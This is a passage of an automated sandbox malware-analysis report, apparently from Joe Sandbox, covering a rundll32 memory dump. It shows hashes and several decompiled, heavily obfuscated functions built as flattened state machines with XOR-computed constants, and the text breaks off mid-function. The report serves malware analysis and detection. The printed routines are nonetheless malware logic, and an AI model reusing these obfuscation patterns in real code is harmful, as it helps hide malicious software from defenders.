Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: fa7f601bf35b379f450afb65332a16de8e1feea65a1091c241486457d8090b65
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: 3B6101711093419FD348CF25D58A50FBBE1FBC8748F408A1DF1DAA6260D7B9DA198F8A

Uniqueness

Uniqueness Score: -1.00%

Function 00245B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00245B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0025023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00248736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00252674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0024F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00248736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0024F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00245b79
0x00245b79
0x00245b80
0x00245b84
0x00245b88
0x00245b92
0x00245b99
0x00245ba1
0x00245ba9
0x00245bae
0x00245bb6
0x00245bbe
0x00245bc6
0x00245bce
0x00245bd6
0x00245bde
0x00245be7
0x00245beb
0x00245bf0
0x00245bfd
0x00245c02
0x00245c08
0x00245c10
0x00245c18
0x00245c1d
0x00245c25
0x00245c2d
0x00245c35
0x00245c3a
0x00245c47
0x00245c48
0x00245c4c
0x00245c54
0x00245c5c
0x00245c61
0x00245c69
0x00245c6e
0x00245c76
0x00245c7e
0x00245c86
0x00245c8e
0x00245c96
0x00245c9e
0x00245ca6
0x00245cae
0x00245cb6
0x00245cbe
0x00245cc6
0x00245cce
0x00245cd6
0x00245cde
0x00245ce6
0x00245cee
0x00245cf6
0x00245cfb
0x00245d03
0x00245d11
0x00245d15
0x00245d1d
0x00245d25
0x00245d32
0x00245d36
0x00245d3b
0x00245d43
0x00245d4d
0x00245d5b
0x00245d60
0x00245d66
0x00245d6e
0x00245d76
0x00245d7e
0x00245d82
0x00245d8a
0x00245d92
0x00245d9a
0x00245da2
0x00245daf
0x00245db0
0x00245db4
0x00245db8
0x00245dbc
0x00245dc4
0x00245dcc
0x00245dda
0x00245dde
0x00245de7
0x00245deb
0x00245df3
0x00245df7
0x00245e09
0x00245e66
0x00245e68
0x00245e6b
0x00245e71
0x00245f29
0x00000000
0x00245e77
0x00245e77
0x00245e7d
0x00000000
0x00245e83
0x00245e87
0x00245e89
0x00245e8d
0x00245e8f
0x00000000
0x00245e91
0x00245e95
0x00245ea0
0x00245ea1
0x00245ea2
0x00245eab
0x00245eb1
0x00000000
0x00245eb3
0x00245ec6
0x00245ed8
0x00245edd
0x00245edf
0x00245ee2
0x00245ee9
0x00245eec
0x00245ef0
0x00245ef4
0x00000000
0x00245ef6
0x00000000
0x00245ef6
0x00245ef4
0x00245eb1
0x00245e8f
0x00245e7d
0x00245e0b
0x00245e11
0x00245f00
0x00245f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00245e17
0x00245e1b
0x00245e28
0x00245e29
0x00245e2c
0x00245e31
0x00245e37
0x00245f0c
0x00245f0c
0x00245f12
0x00245f2d
0x00245f3a
0x00245f14
0x00245f14
0x00245f1a
0x00245f1c
0x00245f1c
0x00245e3d
0x00245e3d
0x00245e41
0x00245e43
0x00245e43
0x00245e47
0x00000000
0x00245e47
0x00245e37
0x00245e11
0x00245f28
0x00245f28
0x00245efb
0x00000000

Strings

l', xrefs: 00245BBE
b-, xrefs: 00245D66
bA, xrefs: 00245C76
z#, xrefs: 00245CFB

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: 7cd659052618a7d1f255f9efa3360ead091d7ea351b3c981e201ba791bf88e6c
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: 3DA130B15187829FD368CF69C48980FBBE1FBC5718F548A1DF595862A0D3B4DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 002480BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002480BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0024602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0025360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00248736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002550F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002561B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00247998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x002480c0
0x002480c8
0x002480c9
0x002480d0
0x002480d3
0x002480d4
0x002480d9
0x002480e1
0x002480e4
0x002480eb
0x002480f3
0x002480f8
0x0024810c
0x0024810d
0x00248111
0x00248116
0x0024811e
0x00248126
0x0024812a
0x00248132
0x0024813a
0x00248142
0x0024814a
0x00248152
0x00248160
0x00248164
0x0024816c
0x00248179
0x0024817d
0x00248185
0x0024818d
0x00248192
0x00248197
0x0024819f
0x002481a7
0x002481ac
0x002481b4
0x002481bc
0x002481c4
0x002481cc
0x002481d4
0x002481dc
0x002481e4
0x002481ec
0x002481f4
0x002481f9
0x00248201
0x0024820e
0x00248212
0x0024821c
0x0024821c
0x0024822e
0x002482c8
0x002482cd
0x002482d0
0x00000000
0x00248234
0x0024823a
0x0024829d
0x0024829e
0x002482a2
0x002482a7
0x002482ab
0x002482ad
0x002482af
0x00000000
0x002482af
0x0024823c
0x0024823e
0x00248282
0x00248287
0x0024828a
0x00000000
0x00248240
0x00248246
0x00248267
0x0024826a
0x00000000
0x00248248
0x0024824e
0x00000000
0x00248254
0x00248254
0x00248256
0x0024825b
0x00000000
0x0024825b
0x0024824e
0x00248246
0x0024823e
0x0024823a
0x00000000
0x0024822e
0x002482ef
0x002482f4
0x002482f7
0x002482fc
0x002482fc
0x002482fc
0x00248309
0x0024830b
0x0024830f
0x0024830f
0x00248316

Strings

+%, xrefs: 00248256
+%, xrefs: 00248240
XE, xrefs: 0024819F
n(, xrefs: 00248201

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: 9dd5ac5f265ffab2ec4f25ced9b3722044155b592d8437cf6a9b25bf202ab8a2
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: F85164701197429FC348DF20C88982FBBE1BFC4748F505A2DF586962A0DBB18A59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00258D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00258D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002585BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0024E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00258D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00248736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00246636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00258d1f
0x00258d28
0x00258d2f
0x00258d3f
0x00258d44
0x00258d4a
0x00258d52
0x00258d5a
0x00258d5f
0x00258d67
0x00258d6f
0x00258d77
0x00258d7f
0x00258d87
0x00258d8f
0x00258d97
0x00258d9f
0x00258da7
0x00258daf
0x00258db7
0x00258dbf
0x00258dc7
0x00258dd3
0x00258dd8
0x00258dde
0x00258de6
0x00258dee
0x00258dfa
0x00258dff
0x00258e09
0x00258e0c
0x00258e10
0x00258e18
0x00258e20
0x00258e28
0x00258e30
0x00258e38
0x00258e40
0x00258e45
0x00258e51
0x00258e56
0x00258e5a
0x00258e5c
0x00258e64
0x00258e6c
0x00258e74
0x00258e79
0x00258e7c
0x00258e92
0x00258e94
0x00258e9c
0x00258ea2
0x00258ea9
0x00258eaf
0x00258eb5
0x00258ebe
0x00258ecc
0x00258ecd
0x00258ed8
0x00258ede
0x00258ee5
0x00258ef0
0x00258ef5
0x00258efc
0x00258f02
0x00258f02
0x00258ede
0x00258ebe
0x00258ea9
0x00258f0e

Strings

9*, xrefs: 00258D67
/, xrefs: 00258E38
oMt, xrefs: 00258DA7
4A3, xrefs: 00258D5F

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: b37d2ca0ffa8f90a641c84c882896629d48a6e65570646e7535eaa21d39c822b
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: FB516671208342DFD358CF25C48A81BFBE1FB98318F204A1CF49696260D7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00242A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00242A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00252349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0024F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00252025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00242a36
0x00242a3f
0x00242a46
0x00242a53
0x00242a58
0x00242a5d
0x00242a64
0x00242a6f
0x00242a72
0x00242a75
0x00242a78
0x00242a7f
0x00242a86
0x00242a8d
0x00242a94
0x00242a9b
0x00242aa6
0x00242aa9
0x00242ab0
0x00242ab7
0x00242abe
0x00242aca
0x00242acb
0x00242ad0
0x00242adf
0x00242ae2
0x00242ae9
0x00242af5
0x00242af8
0x00242aff
0x00242b06
0x00242b0d
0x00242b14
0x00242b1b
0x00242b22
0x00242b26
0x00242b2a
0x00242b31
0x00242b38
0x00242b3f
0x00242b46
0x00242b4d
0x00242b54
0x00242b58
0x00242b5f
0x00242b66
0x00242b6d
0x00242b77
0x00242b7a
0x00242b7c
0x00242b8f
0x00242b9d
0x00242bb2
0x00242bbe
0x00242bcd
0x00242bd3
0x00242bda

Strings

s, xrefs: 00242A9B
+/F, xrefs: 00242A78
^, xrefs: 00242A86
18, xrefs: 00242B66

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: e90e494bb3e77f8d583b409794df6540a3f606f07ff222dcf21acbf5e8665479
Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: 2751F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002573AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002573AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
